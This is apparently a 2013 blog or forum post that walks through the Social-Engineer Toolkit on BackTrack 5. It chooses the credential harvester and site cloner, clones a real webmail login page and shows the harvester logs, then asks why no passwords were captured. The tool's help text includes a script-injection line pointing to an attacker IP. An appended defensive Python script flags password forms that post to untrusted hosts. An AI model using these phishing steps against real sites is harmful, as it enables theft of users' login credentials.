Environment: BT5, XP or Win7, IE6, IE8, Google Chrome

The steps were as follows:

root@bt:/pentest/exploits/set# ./set

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
[---]        Development Team: JR DePre (pr1me)        [---]
[---]        Development Team: Joey Furr (j0fer)       [---]
[---]        Development Team: Thomas Werth            [---]
[---]        Development Team: Garland                 [---]
[---]                  Version: 3.6                    [---]
[---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
[---]        Report bugs: davek@trustedsec.com         [---]
[---]         Follow me on Twitter: dave_rel1k         [---]
[---]       Homepage: https://www.trustedsec.com       [---]

Welcome to the Social-Engineer Toolkit (SET).
Your onestop shop for all of your social-engineering needs..
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com

Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1

Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 2

The Web Attack module is  a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit
browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web-
site that has a username and password field and harvest all the
information posted to the website.

The TabNabbing method will wait for a user to move to a different
tab, then refresh the page to something different.

The Man Left in the Middle Attack method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
data from them. You need to have an already vulnerable site and in-
corporate <script src="http://YOURIP/">. This could either be from a
compromised site or through XSS.

The Web-Jacking Attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>3

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.11
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:email.126.com
[*] Cloning the website: http://email.126.com
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.
Press <return> to continue
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
192.168.1.123 - - [28/Apr/2013 04:39:32] "GET / HTTP/1.1" 200 -
192.168.1.123 - - [28/Apr/2013 04:40:09] "GET / HTTP/1.1" 200 -
192.168.1.123 - - [28/Apr/2013 04:41:11] "GET / HTTP/1.1" 200 -

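I did not get the username and password I wanted.

The cloned website is shown in the figure:

Someone ran into the same problem at http://www.backtrack-linux.org/forums/showthread.php?t=29188.

A successful run should look like this:

Why can't I get the username and password?

Later, I tested directly on BT5 with the Firefox browser, and it succeeded, as shown in the figure:

My initial suspicion is a network problem.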
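
A defensive check that follows from the SET prompts above, which state that the cloned page posts its fields back to the harvester's IP and that the listener runs over HTTP on port 80: flag password forms whose target is cleartext, an IP literal, or not a trusted host. This is an added example, not part of the original post or of SET; the sample HTML, the function and class names, and the host mail.example.com are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse
import ipaddress

class LoginFormAudit(HTMLParser):
    """Collect every <form> and note whether it contains a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []  # each entry: [action attribute, has_password_field]

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append([a.get("action") or "", False])
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.forms:
            self.forms[-1][1] = True

def audit_login_forms(html, page_url, trusted_hosts):
    """Return (target_url, reasons) for password forms that post somewhere unexpected."""
    parser = LoginFormAudit()
    parser.feed(html)
    findings = []
    for action, has_password in parser.forms:
        if not has_password:
            continue
        # An empty or relative action resolves against the page's own URL.
        target = urlparse(urljoin(page_url, action))
        host = target.hostname or ""
        reasons = []
        if target.scheme != "https":
            reasons.append("cleartext-post")
        try:
            ipaddress.ip_address(host)
            reasons.append("ip-literal-host")
        except ValueError:
            pass  # host is a name, not an IP literal
        if host not in trusted_hosts:
            reasons.append("untrusted-host")
        if reasons:
            findings.append((target.geturl(), reasons))
    return findings

# Constructed sample pages (assumed markup, not captured from any real site).
CLONED = '<form method="POST" action="http://192.168.1.11/"><input name="user"><input type="password" name="pw"></form>'
GENUINE = '<form method="post" action="/login"><input name="user"><input type="password" name="pw"></form>'

if __name__ == "__main__":
    print(audit_login_forms(CLONED, "http://192.168.1.11/", {"mail.example.com"}))
    print(audit_login_forms(GENUINE, "https://mail.example.com/", {"mail.example.com"}))
```
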
